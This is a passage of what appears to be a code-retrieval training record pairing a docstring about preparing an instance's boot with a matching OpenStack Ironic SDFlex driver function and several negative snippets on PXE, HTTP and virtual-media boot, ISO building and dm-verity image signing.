pxe_utils.prepare_instance_kickstart_config(\n task, instance_image_info,\n anaconda_boot=(boot_option == \"kickstart\"))\n boot_device = boot_devices.PXE\n\n else:\n # NOTE(dtantsur): create a PXE configuration as a safety net for\n # hardware uncapable of persistent boot. If on a reboot it will try\n # to boot from PXE, this configuration will return it back.\n if CONF.pxe.enable_netboot_fallback:\n pxe_utils.build_service_pxe_config(\n task, instance_image_info,\n task.node.driver_internal_info.get('root_uuid_or_disk_id'),\n ipxe_enabled=self.ipxe_enabled,\n # PXE config for whole disk images is identical to what\n # we need to boot from local disk, so use True even\n # for partition images.\n is_whole_disk_image=True)\n else:\n # Clean up the deployment configuration\n pxe_utils.clean_up_pxe_config(\n task, ipxe_enabled=self.ipxe_enabled)\n boot_device = boot_devices.DISK\n\n # NOTE(pas-ha) do not re-set boot device on ACTIVE nodes\n # during takeover\n if boot_device and task.node.provision_state != states.ACTIVE:\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=True)",
"def prepare_ramdisk(self, task, ramdisk_params):\n if task.node.provision_state in (states.DEPLOYING, states.RESCUING,\n states.CLEANING, states.INSPECTING):\n node = task.node\n d_info = redfish_boot._parse_driver_info(node)\n # Label indicating a deploy or rescue operation being carried out\n # on the node, 'deploy' or 'rescue'. Unless the node is in a\n # rescue like state, the mode is set to 'deploy', indicating\n # deploy operation is being carried out.\n\n mode = deploy_utils.rescue_or_deploy_mode(node)\n\n iso_ref = image_utils.prepare_deploy_iso(task, ramdisk_params,\n mode, d_info)\n node.driver_internal_info.update({'deploy_boot_iso': iso_ref})\n\n sdflex_common.set_network_setting_dhcpless_boot(node, iso_ref)\n boot_mode_utils.sync_boot_mode(task)\n manager_utils.node_set_boot_device(task, boot_devices.UEFIHTTP,\n persistent=False)",
"def prepare_instance(self, task):\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n boot_option = deploy_utils.get_boot_option(task.node)\n if boot_option != \"kickstart\":\n sdflex_common.update_secure_boot_mode(task, True)\n if not http_utils.is_http_boot_requested(task.node):\n if boot_option == \"kickstart\":\n prepare_node_for_deploy(task)\n super(SdflexPXEBoot, self).prepare_instance(task)\n else:\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_option = deploy_utils.get_boot_option(node)\n boot_device = None\n instance_image_info = {}\n if boot_option == \"ramdisk\":\n instance_image_info = http_utils.get_instance_image_info(task)\n http_utils.cache_ramdisk_kernel(task, instance_image_info)\n if deploy_utils.is_iscsi_boot(task) or boot_option == \"ramdisk\":\n http_utils.prepare_instance_http_config(\n task, instance_image_info,\n iscsi_boot=deploy_utils.is_iscsi_boot(task),\n ramdisk_boot=(boot_option == \"ramdisk\"))\n if http_utils.is_http_boot_requested(task.node):\n boot_device = boot_devices.UEFIHTTP\n else:\n boot_device = boot_devices.PXE\n elif boot_option != \"local\":\n if task.driver.storage.should_write_image(task):\n # Make sure that the instance kernel/ramdisk is cached.\n # This is for the takeover scenario for active nodes.\n instance_image_info = (\n http_utils.get_instance_image_info(task))\n http_utils.cache_ramdisk_kernel(task, instance_image_info)\n iwdi = (\n task.node.driver_internal_info.get('is_whole_disk_image'))\n try:\n root_uuid_or_disk_id = task.node.driver_internal_info[\n 'root_uuid_or_disk_id'\n ]\n except KeyError:\n if not task.driver.storage.should_write_image(task):\n pass\n elif not iwdi:\n LOG.warning(\"The UUID for the root partition can't be\"\n \" found, unable to switch the pxe config \"\n \"from deployment mode to service (boot) \"\n \"mode for node %(node)s\",\n {\"node\": task.node.uuid})\n else:\n LOG.warning(\"The disk id for the whole disk image \"\n \"can't be found, unable to switch the \"\n \"pxe config from deployment mode to \"\n \"service (boot) mode for node %(node)s. \"\n \"Booting the instance from disk.\",\n {\"node\": task.node.uuid})\n http_utils.clean_up_http_config(task)\n boot_device = boot_devices.DISK\n else:\n http_utils.build_service_http_config(task,\n instance_image_info,\n root_uuid_or_disk_id)\n if http_utils.is_http_boot_requested(task.node):\n boot_device = boot_devices.UEFIHTTP\n else:\n boot_device = boot_devices.PXE\n else:\n # If it's going to boot from the local disk, we don't need\n # PXE config files. They still need to be generated as part\n # of the prepare() because the deployment does PXE boot the\n # deploy ramdisk\n http_utils.clean_up_http_config(task)\n boot_device = boot_devices.DISK\n\n # NOTE(pas-ha) do not re-set boot device on ACTIVE nodes\n # during takeover\n if boot_device and task.node.provision_state != states.ACTIVE:\n persistent = True\n if node.driver_info.get('force_persistent_boot_device',\n 'Default') == 'Never':\n persistent = False\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=persistent)",
"def prepare_ramdisk(self, task, ramdisk_params):\n node = task.node\n remote_server_data = {}\n remote_image_server = node.driver_info.get('remote_image_server')\n remote_image_share_root = node.driver_info.get(\n 'remote_image_share_root')\n remote_server_data['remote_image_share_type'] = (\n node.driver_info.get('remote_image_share_type'))\n remote_server_data['remote_image_user_name'] = (\n node.driver_info.get('remote_image_user_name', None))\n remote_server_data['remote_image_user_password'] = (\n node.driver_info.get('remote_image_user_password', None))\n\n # NOTE(TheJulia): If this method is being called by something\n # aside from deployment, clean and rescue, such as conductor takeover,\n # we should treat this as a no-op and move on otherwise we would\n # modify the state of the node due to virtual media operations.\n if node.provision_state not in (states.DEPLOYING,\n states.CLEANING,\n states.RESCUING,\n states.INSPECTING):\n return\n\n # NOTE(TheJulia): Since we're deploying, cleaning, or rescuing,\n # with virtual media boot, we should generate a token!\n manager_utils.add_secret_token(node, pregenerated=True)\n node.save()\n ramdisk_params['ipa-agent-token'] = (\n node.driver_internal_info['agent_secret_token'])\n\n manager_utils.node_power_action(task, states.POWER_OFF)\n\n deploy_nic_mac = deploy_utils.get_single_nic_with_vif_port_id(task)\n ramdisk_params['BOOTIF'] = deploy_nic_mac\n if CONF.debug and 'ipa-debug' not in ramdisk_params:\n ramdisk_params['ipa-debug'] = '1'\n\n mode = deploy_utils.rescue_or_deploy_mode(node)\n iso_ref = self._prepare_deploy_iso(task, ramdisk_params, mode)\n\n url = (remote_server_data['remote_image_share_type'] + \"://\" +\n remote_image_server + \"/\" + remote_image_share_root + \"/\" +\n iso_ref)\n\n sdflex_common.eject_vmedia(task,\n vmedia_device)\n sdflex_common.insert_vmedia(task, url,\n vmedia_device,\n remote_server_data)\n\n boot_mode_utils.sync_boot_mode(task)\n\n self._set_boot_device(task, boot_devices.CD.value.lower())\n\n LOG.debug(\"Node %(node)s is set to one time boot from \"\n \"%(device)s\", {'node': task.node.uuid,\n 'device': boot_devices.CD})",
"def _prepare_boot_iso(self, task, root_uuid=None):\n node = task.node\n d_info = redfish_boot._parse_deploy_info(node)\n\n kernel_href = node.instance_info.get('kernel')\n ramdisk_href = node.instance_info.get('ramdisk')\n\n if not kernel_href or not ramdisk_href:\n\n image_href = d_info['image_source']\n\n image_properties = (\n images.get_image_properties(\n task.context, image_href, ['kernel_id', 'ramdisk_id']))\n\n if not kernel_href:\n kernel_href = image_properties.get('kernel_id')\n\n if not ramdisk_href:\n ramdisk_href = image_properties.get('ramdisk_id')\n\n if not kernel_href or not ramdisk_href:\n raise exception.InvalidParameterValue(_(\n \"Unable to find kernel or ramdisk for \"\n \"to generate boot ISO for %(node)s\") %\n {'node': task.node.uuid})\n\n bootloader_href = d_info.get('bootloader')\n\n return self._prepare_iso_image(\n task, kernel_href, ramdisk_href, bootloader_href,\n root_uuid=root_uuid)",
"def prepare_instance(self, task):\n node = task.node\n\n boot_option = deploy_utils.get_boot_option(node)\n\n self.clean_up_instance(task)\n\n remote_image_server = node.driver_info.get('remote_image_server')\n remote_image_share_root = node.driver_info.get(\n 'remote_image_share_root')\n\n remote_server_data = {}\n remote_server_data['remote_image_share_type'] = (\n node.driver_info.get('remote_image_share_type'))\n remote_server_data['remote_image_user_name'] = (\n node.driver_info.get('remote_image_user_name', None))\n remote_server_data['remote_image_user_password'] = (\n node.driver_info.get('remote_image_user_password', None))\n\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n sdflex_common.update_secure_boot_mode(task, True)\n iwdi = node.driver_internal_info.get('is_whole_disk_image')\n if boot_option == \"local\" or iwdi:\n self._set_boot_device(\n task, boot_devices.DISK, persistent=True)\n\n LOG.debug(\"Node %(node)s is set to permanently boot from local \"\n \"%(device)s\", {'node': task.node.uuid,\n 'device': boot_devices.DISK})\n return\n\n params = {}\n\n if boot_option != 'ramdisk':\n root_uuid = node.driver_internal_info.get('root_uuid_or_disk_id')\n\n if not root_uuid and task.driver.storage.should_write_image(task):\n LOG.warning(\n \"The UUID of the root partition could not be found for \"\n \"node %s. Booting instance from disk anyway.\", node.uuid)\n\n self._set_boot_device(\n task, boot_devices.DISK, persistent=True)\n\n return\n\n params.update(root_uuid=root_uuid)\n\n iso_ref = self._prepare_boot_iso(task, **params)\n\n url = (remote_server_data['remote_image_share_type'] + \"://\" +\n remote_image_server + \"/\" + remote_image_share_root + \"/\" +\n iso_ref)\n\n sdflex_common.eject_vmedia(task,\n vmedia_device)\n sdflex_common.insert_vmedia(task, url,\n vmedia_device,\n remote_server_data)\n\n boot_mode_utils.sync_boot_mode(task)\n\n self._set_boot_device(\n task, boot_devices.CD.value.lower(), persistent=True)\n\n LOG.debug(\"Node %(node)s is set to permanently boot from \"\n \"%(device)s\", {'node': task.node.uuid,\n 'device': boot_devices.CD})",
"def _prepare_iso_image(self, task, kernel_href, ramdisk_href,\n bootloader_href=None, configdrive=None,\n root_uuid=None, params=None):\n if not kernel_href or not ramdisk_href:\n raise exception.InvalidParameterValue(_(\n \"Unable to find kernel or ramdisk for \"\n \"building ISO for %(node)s\") %\n {'node': task.node.uuid})\n\n i_info = task.node.instance_info\n driver_info = task.node.driver_info\n if driver_info.get('remote_image_share_type') == 'nfs':\n image_share_root = driver_info.get('remote_image_share_root')\n else:\n image_share_root = driver_info.get('image_share_root')\n if deploy_utils.get_boot_option(task.node) == \"ramdisk\":\n kernel_params = \"root=/dev/ram0 text \"\n kernel_params += i_info.get(\"ramdisk_kernel_arguments\", \"\")\n\n else:\n kernel_params = i_info.get('kernel_append_params', \"\")\n\n if params:\n kernel_params = ' '.join(\n (kernel_params, ' '.join(\n '%s=%s' % kv for kv in params.items())))\n\n boot_mode = boot_mode_utils.get_boot_mode_for_deploy(task.node)\n\n LOG.debug(\"Trying to create %(boot_mode)s ISO image for node %(node)s \"\n \"with kernel %(kernel_href)s, ramdisk %(ramdisk_href)s, \"\n \"bootloader %(bootloader_href)s and kernel params %(params)s\"\n \"\", {'node': task.node.uuid,\n 'boot_mode': boot_mode,\n 'kernel_href': kernel_href,\n 'ramdisk_href': ramdisk_href,\n 'bootloader_href': bootloader_href,\n 'params': kernel_params})\n\n with tempfile.NamedTemporaryFile(\n dir=CONF.tempdir, suffix='.iso') as boot_fileobj:\n\n with tempfile.NamedTemporaryFile(\n dir=CONF.tempdir, suffix='.img') as cfgdrv_fileobj:\n\n configdrive_href = configdrive\n\n if configdrive:\n parsed_url = urlparse.urlparse(configdrive)\n if not parsed_url.scheme:\n cfgdrv_blob = base64.decode_as_bytes(configdrive)\n\n with open(cfgdrv_fileobj.name, 'wb') as f:\n f.write(cfgdrv_blob)\n\n configdrive_href = urlparse.urlunparse(\n ('file', '', cfgdrv_fileobj.name, '', '', ''))\n\n LOG.info(\"Burning configdrive %(url)s to boot ISO image \"\n \"for node %(node)s\", {'url': configdrive_href,\n 'node': task.node.uuid})\n boot_iso_tmp_file = boot_fileobj.name\n\n images.create_boot_iso(\n task.context, boot_iso_tmp_file,\n kernel_href, ramdisk_href,\n esp_image_href=bootloader_href,\n root_uuid=root_uuid,\n kernel_params=kernel_params,\n boot_mode=boot_mode)\n iso_object_name = self._get_iso_image_name(task.node)\n\n image_url = self._publish_image(\n boot_iso_tmp_file, iso_object_name, image_share_root)\n\n LOG.debug(\"Created ISO %(name)s in NFS/CIFS for node %(node)s, \"\n \"exposed as temporary URL \"\n \"%(url)s\", {'node': task.node.uuid,\n 'name': iso_object_name,\n 'url': image_url})\n\n return image_url",
"def prepare_instance(self, task):\n\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n sdflex_common.update_secure_boot_mode(task, True)\n\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_device = None\n\n self.clean_up_instance(task)\n boot_device = boot_devices.DISK\n\n if boot_device and task.node.provision_state != states.ACTIVE:\n persistent = True\n if node.driver_info.get('force_persistent_boot_device',\n 'Default') == 'Never':\n persistent = False\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=persistent)",
"def setupBootRegion(self):\n self.virtualMemoryRequest(\n \"PhysicalRegion\",\n {\n \"RegionType\": \"BootRegion\",\n \"Size\": PcConfig.get_boot_region_size(),\n \"Type\": \"I\",\n \"Bank\": 0,\n },\n )",
"def prepVm(self):\r\n self.server.logMsg(\"PREPARING \" + self.vmName + \" FOR TESTING\")\r\n self.server.logMsg(self.vmName + \" OPERATING SYSTEM: \" + self.vmOS)\r\n self.server.logMsg(self.vmName + \" ARCHITECTURE: \" + self.getArch())\r\n self.getSnapshots()\r\n self.powerOn(False)",
"def _prepare_deploy_iso(self, task, params, mode):\n node = task.node\n d_info = redfish_boot._parse_driver_info(node)\n\n kernel_href = d_info.get('%s_kernel' % mode)\n ramdisk_href = d_info.get('%s_ramdisk' % mode)\n bootloader_href = d_info.get('bootloader')\n\n return self._prepare_iso_image(\n task, kernel_href, ramdisk_href, bootloader_href, params=params)",
"def bootNodes(self):\n self.libvirt.bootSlaves()",
"def boot_installer(self):\n boot_timeout = int(config.get('iso_installer', 'BOOT_TIMEOUT'))\n self.child.expect('Escape character')\n LOG.info('connected to the VM (controller-0)')\n # send a escape character\n self.child.sendline('\\x1b')\n self.child.expect('boot:')\n cmd_boot_line = common.get_cmd_boot_line()\n self.child.sendline(cmd_boot_line)\n LOG.info('kernel command line sent: %s', cmd_boot_line)\n # send a enter character\n self.child.sendline('\\r')\n # setting a boot timeout\n self.child.timeout = boot_timeout\n self.child.expect('Loading vmlinuz')\n LOG.info('Loading vmlinuz')\n self.child.expect('Loading initrd.img')\n LOG.info('Loading initrd.img')\n self.child.expect('Starting installer, one moment...')\n LOG.info('Starting installer ...')\n self.child.expect('Performing post-installation setup tasks')\n LOG.info('Performing post-installation setup tasks')",
"def do_prepare_partition(cls, part, source_params, creator, cr_workdir,\n oe_builddir, bootimg_dir, kernel_dir,\n rootfs_dir, native_sysroot):\n\n # We rely on the --label parameter and the naming convention\n # in partition.py prepare_rootfs() here to find the already\n # prepared rootfs partition image.\n pattern = '%s/rootfs_%s.*' % (cr_workdir, part.label)\n rootfs = glob.glob(pattern)\n if len(rootfs) != 1:\n raise WicError(\"%s shell pattern does not match exactly one rootfs image (missing --label parameter?): %s\" % (pattern, rootfs))\n else:\n rootfs = rootfs[0]\n logger.debug(\"Calculating dm-verity hash for rootfs %s (native %s).\" % (rootfs, native_sysroot))\n\n hashimg = '%s/dm-verity_%s.img' % (cr_workdir, part.label)\n # Reserve some fixed amount of space at the start of the hash image\n # for our own data (in particular, the signed root hash).\n # The content of that part is:\n # roothash=<....>\n # <potentially some more assignments in the future>\n # signature=<single line of base64 encoded OpenSSL sha256 digest>\n header_size = 4096\n ret, out = exec_native_cmd(\"veritysetup format '%s' '%s' --hash-offset=%d\" %\n (rootfs, hashimg, header_size),\n native_sysroot)\n m = re.search(r'^Root hash:\\s*(\\S+)$', out, re.MULTILINE)\n if ret or not m:\n raise WicError('veritysetup failed: %s' % out)\n else:\n root_hash = m.group(1)\n privkey = get_bitbake_var('REFKIT_DMVERITY_PRIVATE_KEY')\n password = get_bitbake_var('REFKIT_DMVERITY_PASSWORD')\n tmp = tempfile.mkdtemp(prefix='dm-verity-')\n try:\n data_filename = os.path.join(tmp, 'data')\n header = ('roothash=%s\\nheadersize=%d\\n' % (root_hash, header_size)).encode('ascii')\n with open(data_filename, 'wb') as data:\n data.write(header)\n # Must use a temporary file, exec_native_cmd() only supports UTF-8 output.\n signature = os.path.join(tmp, 'sig')\n ret, out = exec_native_cmd(\"openssl dgst -sha256 -passin '%s' -sign '%s' -out '%s' '%s'\" %\n (password, privkey, signature, data_filename),\n native_sysroot)\n if ret:\n raise WicError('openssl signing failed')\n with open(signature, 'rb') as f:\n header += b'signature=' + base64.standard_b64encode(f.read()) + b'\\n'\n if len(header) + 1 >= header_size:\n raise WicError('reserved space for dm-verity header too small')\n with open(hashimg, 'rb+') as hash:\n hash.write(header)\n finally:\n shutil.rmtree(tmp)\n\n data_bytes = os.stat(rootfs).st_size\n hash_bytes = os.stat(hashimg).st_size\n logger.debug(\"dm-verity data partition %d bytes, hash partition %d bytes, ratio %f.\" %\n (data_bytes, hash_bytes, data_bytes / hash_bytes))\n part.size = data_bytes // 1024\n part.source_file = hashimg",
"def bootMaster(self):\n self.libvirt.bootMaster()\n time.sleep(100)",
"def generate_ipxe_boot_file(self):\n logging.info('Creating image \\'' + self.name + '\\' IPXE boot file')\n\n # Format image ipxe boot file template with image attributes\n file_content = self.__class__.get_boot_file_template().format(image_name=self.name,\n image_initramfs=self.image,\n image_kernel=self.kernel)\n\n # Create ipxe boot file\n logging.debug('Creating boot content inside file ' + self.IMAGE_DIRECTORY + 'boot.ipxe')\n with open(self.IMAGE_DIRECTORY + 'boot.ipxe', \"w\") as ff:\n ff.write(file_content)",
"def clean_up_ramdisk(self, task):\n node = task.node\n mode = deploy_utils.rescue_or_deploy_mode(node)\n try:\n images_info = pxe_utils.get_image_info(\n node, mode=mode, ipxe_enabled=self.ipxe_enabled)\n except exception.MissingParameterValue as e:\n LOG.warning('Could not get %(mode)s image info '\n 'to clean up images for node %(node)s: %(err)s',\n {'mode': mode, 'node': node.uuid, 'err': e})\n else:\n pxe_utils.clean_up_pxe_env(\n task, images_info, ipxe_enabled=self.ipxe_enabled)",
"def prepare(topology='devstack'):\n log.info(\"Preparing boxes for %s Openstack\" % topology)\n log.info(\"Preparing virtual machines for lab=%s\" % LAB)\n url = IMAGES_REPO + DEVSTACK_DISK\n local(\"test -e %s || wget -nv %s\" % (DEVSTACK_DISK, url))\n local(\"python ./tools/cloud/create.py -l {lab} -s /opt/imgs \"\n \"-z ./{disk} -t {topo} > config_file\".format(lab=LAB,\n disk=DEVSTACK_DISK,\n topo=topology))"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Prepares the boot of the instance. This method prepares the boot of the instance after reading the relevant information from the node's instance_info. In the case of UEFI HTTP boot, it switches to the UEFI HTTP config. In the case of local boot, it cleans up the PXE config. In the case of 'boot from volume', it updates the iSCSI info onto the SDFlex and sets the node to boot from the 'UefiTarget' boot device.
|
def prepare_instance(self, task):
# Need to enable secure boot, if being requested.
# update_secure_boot_mode checks and enables secure boot only if the
# deploy has requested secure boot
boot_option = deploy_utils.get_boot_option(task.node)
if boot_option != "kickstart":
sdflex_common.update_secure_boot_mode(task, True)
if not http_utils.is_http_boot_requested(task.node):
if boot_option == "kickstart":
prepare_node_for_deploy(task)
super(SdflexPXEBoot, self).prepare_instance(task)
else:
boot_mode_utils.sync_boot_mode(task)
node = task.node
boot_option = deploy_utils.get_boot_option(node)
boot_device = None
instance_image_info = {}
if boot_option == "ramdisk":
instance_image_info = http_utils.get_instance_image_info(task)
http_utils.cache_ramdisk_kernel(task, instance_image_info)
if deploy_utils.is_iscsi_boot(task) or boot_option == "ramdisk":
http_utils.prepare_instance_http_config(
task, instance_image_info,
iscsi_boot=deploy_utils.is_iscsi_boot(task),
ramdisk_boot=(boot_option == "ramdisk"))
if http_utils.is_http_boot_requested(task.node):
boot_device = boot_devices.UEFIHTTP
else:
boot_device = boot_devices.PXE
elif boot_option != "local":
if task.driver.storage.should_write_image(task):
# Make sure that the instance kernel/ramdisk is cached.
# This is for the takeover scenario for active nodes.
instance_image_info = (
http_utils.get_instance_image_info(task))
http_utils.cache_ramdisk_kernel(task, instance_image_info)
iwdi = (
task.node.driver_internal_info.get('is_whole_disk_image'))
try:
root_uuid_or_disk_id = task.node.driver_internal_info[
'root_uuid_or_disk_id'
]
except KeyError:
if not task.driver.storage.should_write_image(task):
pass
elif not iwdi:
LOG.warning("The UUID for the root partition can't be"
" found, unable to switch the pxe config "
"from deployment mode to service (boot) "
"mode for node %(node)s",
{"node": task.node.uuid})
else:
LOG.warning("The disk id for the whole disk image "
"can't be found, unable to switch the "
"pxe config from deployment mode to "
"service (boot) mode for node %(node)s. "
"Booting the instance from disk.",
{"node": task.node.uuid})
http_utils.clean_up_http_config(task)
boot_device = boot_devices.DISK
else:
http_utils.build_service_http_config(task,
instance_image_info,
root_uuid_or_disk_id)
if http_utils.is_http_boot_requested(task.node):
boot_device = boot_devices.UEFIHTTP
else:
boot_device = boot_devices.PXE
else:
# If it's going to boot from the local disk, we don't need
# PXE config files. They still need to be generated as part
# of the prepare() because the deployment does PXE boot the
# deploy ramdisk
http_utils.clean_up_http_config(task)
boot_device = boot_devices.DISK
# NOTE(pas-ha) do not re-set boot device on ACTIVE nodes
# during takeover
if boot_device and task.node.provision_state != states.ACTIVE:
persistent = True
if node.driver_info.get('force_persistent_boot_device',
'Default') == 'Never':
persistent = False
manager_utils.node_set_boot_device(task, boot_device,
persistent=persistent)
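
Illustrative only (not part of the dataset record): the final block above derives the 'persistent' flag from the 'force_persistent_boot_device' driver_info value. The hypothetical helper below simply restates that mapping in isolation.

def _wants_persistent_boot_device(driver_info):
    # Persistent unless the operator explicitly asked for 'Never'.
    return driver_info.get('force_persistent_boot_device', 'Default') != 'Never'

assert _wants_persistent_boot_device({}) is True
assert _wants_persistent_boot_device({'force_persistent_boot_device': 'Never'}) is False
assert _wants_persistent_boot_device({'force_persistent_boot_device': 'Always'}) is True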
|
[
"def prepare_instance(self, task):\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_device = None\n boot_option = deploy_utils.get_boot_option(node)\n if boot_option != \"kickstart\":\n boot_mode_utils.configure_secure_boot_if_needed(task)\n\n instance_image_info = {}\n if boot_option == \"ramdisk\" or boot_option == \"kickstart\":\n instance_image_info = pxe_utils.get_instance_image_info(\n task, ipxe_enabled=self.ipxe_enabled)\n pxe_utils.cache_ramdisk_kernel(task, instance_image_info,\n ipxe_enabled=self.ipxe_enabled)\n if 'ks_template' in instance_image_info:\n ks_cfg = pxe_utils.validate_kickstart_template(\n instance_image_info['ks_template'][1]\n )\n pxe_utils.validate_kickstart_file(ks_cfg)\n\n if (deploy_utils.is_iscsi_boot(task) or boot_option == \"ramdisk\"\n or boot_option == \"kickstart\"):\n pxe_utils.prepare_instance_pxe_config(\n task, instance_image_info,\n iscsi_boot=deploy_utils.is_iscsi_boot(task),\n ramdisk_boot=(boot_option == \"ramdisk\"),\n anaconda_boot=(boot_option == \"kickstart\"),\n ipxe_enabled=self.ipxe_enabled)\n pxe_utils.prepare_instance_kickstart_config(\n task, instance_image_info,\n anaconda_boot=(boot_option == \"kickstart\"))\n boot_device = boot_devices.PXE\n\n else:\n # NOTE(dtantsur): create a PXE configuration as a safety net for\n # hardware uncapable of persistent boot. If on a reboot it will try\n # to boot from PXE, this configuration will return it back.\n if CONF.pxe.enable_netboot_fallback:\n pxe_utils.build_service_pxe_config(\n task, instance_image_info,\n task.node.driver_internal_info.get('root_uuid_or_disk_id'),\n ipxe_enabled=self.ipxe_enabled,\n # PXE config for whole disk images is identical to what\n # we need to boot from local disk, so use True even\n # for partition images.\n is_whole_disk_image=True)\n else:\n # Clean up the deployment configuration\n pxe_utils.clean_up_pxe_config(\n task, ipxe_enabled=self.ipxe_enabled)\n boot_device = boot_devices.DISK\n\n # NOTE(pas-ha) do not re-set boot device on ACTIVE nodes\n # during takeover\n if boot_device and task.node.provision_state != states.ACTIVE:\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=True)",
"def prepare_instance(self, task):\n node = task.node\n\n boot_option = deploy_utils.get_boot_option(node)\n\n self.clean_up_instance(task)\n\n remote_image_server = node.driver_info.get('remote_image_server')\n remote_image_share_root = node.driver_info.get(\n 'remote_image_share_root')\n\n remote_server_data = {}\n remote_server_data['remote_image_share_type'] = (\n node.driver_info.get('remote_image_share_type'))\n remote_server_data['remote_image_user_name'] = (\n node.driver_info.get('remote_image_user_name', None))\n remote_server_data['remote_image_user_password'] = (\n node.driver_info.get('remote_image_user_password', None))\n\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n sdflex_common.update_secure_boot_mode(task, True)\n iwdi = node.driver_internal_info.get('is_whole_disk_image')\n if boot_option == \"local\" or iwdi:\n self._set_boot_device(\n task, boot_devices.DISK, persistent=True)\n\n LOG.debug(\"Node %(node)s is set to permanently boot from local \"\n \"%(device)s\", {'node': task.node.uuid,\n 'device': boot_devices.DISK})\n return\n\n params = {}\n\n if boot_option != 'ramdisk':\n root_uuid = node.driver_internal_info.get('root_uuid_or_disk_id')\n\n if not root_uuid and task.driver.storage.should_write_image(task):\n LOG.warning(\n \"The UUID of the root partition could not be found for \"\n \"node %s. Booting instance from disk anyway.\", node.uuid)\n\n self._set_boot_device(\n task, boot_devices.DISK, persistent=True)\n\n return\n\n params.update(root_uuid=root_uuid)\n\n iso_ref = self._prepare_boot_iso(task, **params)\n\n url = (remote_server_data['remote_image_share_type'] + \"://\" +\n remote_image_server + \"/\" + remote_image_share_root + \"/\" +\n iso_ref)\n\n sdflex_common.eject_vmedia(task,\n vmedia_device)\n sdflex_common.insert_vmedia(task, url,\n vmedia_device,\n remote_server_data)\n\n boot_mode_utils.sync_boot_mode(task)\n\n self._set_boot_device(\n task, boot_devices.CD.value.lower(), persistent=True)\n\n LOG.debug(\"Node %(node)s is set to permanently boot from \"\n \"%(device)s\", {'node': task.node.uuid,\n 'device': boot_devices.CD})",
"def prepare_instance(self, task):\n\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n sdflex_common.update_secure_boot_mode(task, True)\n\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_device = None\n\n self.clean_up_instance(task)\n boot_device = boot_devices.DISK\n\n if boot_device and task.node.provision_state != states.ACTIVE:\n persistent = True\n if node.driver_info.get('force_persistent_boot_device',\n 'Default') == 'Never':\n persistent = False\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=persistent)",
"def prepare_ramdisk(self, task, ramdisk_params):\n if task.node.provision_state in (states.DEPLOYING, states.RESCUING,\n states.CLEANING, states.INSPECTING):\n prepare_node_for_deploy(task)\n if not http_utils.is_http_boot_requested(task.node):\n super(SdflexPXEBoot, self).prepare_ramdisk(task, ramdisk_params)\n else:\n node = task.node\n # Label indicating a deploy or rescue operation being carried out\n # on the node, 'deploy' or 'rescue'. Unless the node is in a\n # rescue like state, the mode is set to 'deploy', indicating\n # deploy operation is being carried out.\n mode = deploy_utils.rescue_or_deploy_mode(node)\n\n http_info = http_utils.get_image_info(node, mode=mode)\n\n # NODE: Try to validate and fetch instance images only\n # if we are in DEPLOYING state.\n if node.provision_state == states.DEPLOYING:\n http_info.update(http_utils.get_instance_image_info(task))\n boot_mode_utils.sync_boot_mode(task)\n\n http_options = http_utils.build_http_config_options(task,\n http_info)\n http_options.update(ramdisk_params)\n http_config_template = deploy_utils.get_pxe_config_template(node)\n http_utils.create_http_config(task, http_options,\n http_config_template)\n manager_utils.node_set_boot_device(task, boot_devices.UEFIHTTP,\n persistent=False)\n if http_info:\n http_utils.cache_ramdisk_kernel(task, http_info)\n bfpv = str(task.node.driver_info.get('bfpv', 'false')).lower()\n if bfpv == 'true':\n node = task.node\n driver_internal_info = node.driver_internal_info\n driver_internal_info['bfpv_started'] = 'false'\n node.driver_internal_info = driver_internal_info\n node.save()",
"def _prepare_boot_iso(self, task, root_uuid=None):\n node = task.node\n d_info = redfish_boot._parse_deploy_info(node)\n\n kernel_href = node.instance_info.get('kernel')\n ramdisk_href = node.instance_info.get('ramdisk')\n\n if not kernel_href or not ramdisk_href:\n\n image_href = d_info['image_source']\n\n image_properties = (\n images.get_image_properties(\n task.context, image_href, ['kernel_id', 'ramdisk_id']))\n\n if not kernel_href:\n kernel_href = image_properties.get('kernel_id')\n\n if not ramdisk_href:\n ramdisk_href = image_properties.get('ramdisk_id')\n\n if not kernel_href or not ramdisk_href:\n raise exception.InvalidParameterValue(_(\n \"Unable to find kernel or ramdisk for \"\n \"to generate boot ISO for %(node)s\") %\n {'node': task.node.uuid})\n\n bootloader_href = d_info.get('bootloader')\n\n return self._prepare_iso_image(\n task, kernel_href, ramdisk_href, bootloader_href,\n root_uuid=root_uuid)",
"def _connect_boot_volume(self, volume, mountpoint, context, instance):\n LOG.debug('Connecting boot volume')\n instance_uuid = instance['uuid']\n volume_id = volume['id']\n\n connector = self.get_volume_connector(instance)\n connection_info = self._initialize_volume_connection(context,\n volume_id,\n connector)\n\n # Check connection_info to determine if the provided volume is\n # local to this compute node. If it is, then don't use it for\n # Solaris branded zones in order to avoid a known ZFS deadlock issue\n # when using a zpool within another zpool on the same system.\n extra_specs = self._get_flavor(instance)['extra_specs'].copy()\n brand = extra_specs.get('zonecfg:brand', ZONE_BRAND_SOLARIS)\n if brand == ZONE_BRAND_SOLARIS:\n driver_type = connection_info['driver_volume_type']\n if driver_type == 'local':\n msg = _(\"Detected 'local' zvol driver volume type \"\n \"from volume service, which should not be \"\n \"used as a boot device for 'solaris' \"\n \"branded zones.\")\n raise exception.InvalidVolume(reason=msg)\n elif driver_type == 'iscsi':\n # Check for a potential loopback iSCSI situation\n data = connection_info['data']\n target_portal = data['target_portal']\n # Strip off the port number (eg. 127.0.0.1:3260)\n host = target_portal.rsplit(':', 1)\n # Strip any enclosing '[' and ']' 